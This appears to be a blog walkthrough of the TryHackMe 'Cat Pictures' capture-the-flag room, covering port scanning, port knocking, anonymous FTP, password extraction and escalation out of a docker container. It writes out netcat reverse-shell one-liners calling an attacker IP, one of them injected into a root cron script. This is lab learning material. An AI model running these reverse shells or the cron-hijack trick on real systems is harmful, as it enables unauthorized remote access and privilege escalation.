Cat Pictures — TryHackMe

https://tryhackme.com/room/catpictures

This is a write-up for TryHackMe’s room named Cat Pictures. We first needed to find out the port where the web-server is running, which while navigating gave us a hint to perform Port-Knocking.Then we needed to do a bit of binary reversing and then a nice privesc from a docker environment.

Let’s start with finding out what all services are running:

NMAP

# Identify the list of services running on the target machine
⇒ sudo nmap -sS -Pn -T4 -p- 10.10.90.64

PORT     STATE    SERVICE
21/tcp filtered ftp
22/tcp open ssh
2375/tcp filtered docker
4420/tcp open nvm-express
8080/tcp open http-proxy

# Perform further information gathering on the open ports identified above
⇒ sudo nmap -O -A -Pn -T4 -p21,22,2375,4420,8080 10.10.90.64

PORT     STATE    SERVICE      VERSION
21/tcp filtered ftp
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 37:43:64:80:d3:5a:74:62:81:b7:80:6b:1a:23:d8:4a (RSA)
| 256 53:c6:82:ef:d2:77:33:ef:c1:3d:9c:15:13:54:0e:b2 (ECDSA)
|_ 256 ba:97:c3:23:d4:f2:cc:08:2c:e1:2b:30:06:18:95:41 (ED25519)
2375/tcp filtered docker
4420/tcp open nvm-express?
| fingerprint-strings:
| DNSVersionBindReqTCP, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
| INTERNAL SHELL SERVICE
| please note: cd commands do not work at the moment, the developers are fixing it at the moment.
| ctrl-c
| Please enter password:
| Invalid password...
| Connection Closed
| NULL, RPCCheck:
| INTERNAL SHELL SERVICE
| please note: cd commands do not work at the moment, the developers are fixing it at the moment.
| ctrl-c
|_ Please enter password:
8080/tcp open http Apache httpd 2.4.46 ((Unix) OpenSSL/1.1.1d PHP/7.3.27)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.46 (Unix) OpenSSL/1.1.1d PHP/7.3.27
|_http-title: Cat Pictures - Index page

*Note that FTP ports is filtered.

Web Server

Check out the web server running at port 8080. Browsing around we found w user comment at http://10.10.84.51:8080/viewtopic.php?f=2&t=2, which talks about knocking:

Web Page at port 8080

It looks as if we have been told to knock on the server using the sequence give.

Port Knocking

Read for Port Knocking here and use knock program and run:

knock 10.10.84.51 1111 2222 3333 4444 

Run this command few times and run the NMAP scan again to see if there is any difference in the Port Scan results:

PORT     STATE    SERVICE
21/tcp open ftp
22/tcp open ssh
2375/tcp filtered docker
4420/tcp open nvm-express
8080/tcp open http-proxy

Now FTP port is in OPEN state.

FTP

Connect to the FTP server using anonymous:

┌──(kali㉿kali)-[~]
└─$ ftp 10.10.84.51
Connected to 10.10.84.51.
220 (vsFTPd 3.0.3)
Name (10.10.84.51:kali): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 162 Apr 02 14:32 note.txt
226 Directory send OK.
ftp> get note.txt
local: note.txt remote: note.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note.txt (162 bytes).
226 Transfer complete.
162 bytes received in 0.00 secs (676.0817 kB/s)
ftp> quit
221 Goodbye.

Note.txt gives is a hint:

note.txt

SHELL

Connect to port 4420 using netcat :

shell

It looks like a very limited shell. After navigating used this to get a better shell:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc MY_IP 9999 >/tmp/f

and captured the reverse shell:

reverse shell

In /home/catlover directory found an executable runme . Running this exe ask for a password:

runme

Copy over this exe to our kali machine using netcatto analyse further:

Receiving side
nc -l -p 8888 > runme
Sending side
nc 10.8.98.192 8888 < runme

Run strings on this exe, we can see a potential password:

strings runme

Now run the exe and use this password:

User Flag

We got a SSH private key. Copy this key and change its permission to 600 and try to connect to the server with user catlover :

ssh -i id_rsa catlover@10.10.84.51
ssh using private key

We got our first flag at /root/flag.txt

flag.txt

Root Flag

It looks like we are in a docker environment. Let’s run LINPEAS to find out have can be escalate our privileges. We can see that a strange directory shows up in the scan :

Investigating /opt/clean directory further shows a script:

root@7546fa2336d6:/# ls -lrt /opt/clean/
total 4
-rw-r--r-- 1 root root 27 May 1 00:20 clean.sh
root@7546fa2336d6:/#
root@7546fa2336d6:/# cat /opt/clean/clean.sh
#!/bin/bash
rm -rf /tmp/*
root@7546fa2336d6:/#

Looks like it is cleaning /tmp directory. May be /opt/clean/clean.shis running as a cronjob. To test this,we will add another reverse shell here in /op/clean/clean.sh and try to capture that at our end:

root@7546fa2336d6:/# echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.98.192 7777 >/tmp/f" > /opt/clean/clean.sh

Start nc listener on kali and wait for the cronjob to run:

Sure enough we got our shell in sometime. The root flag was at /root/root.txt

This was a nice and easy room. Hope you enjoyed the write-up. Thanks for reading.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store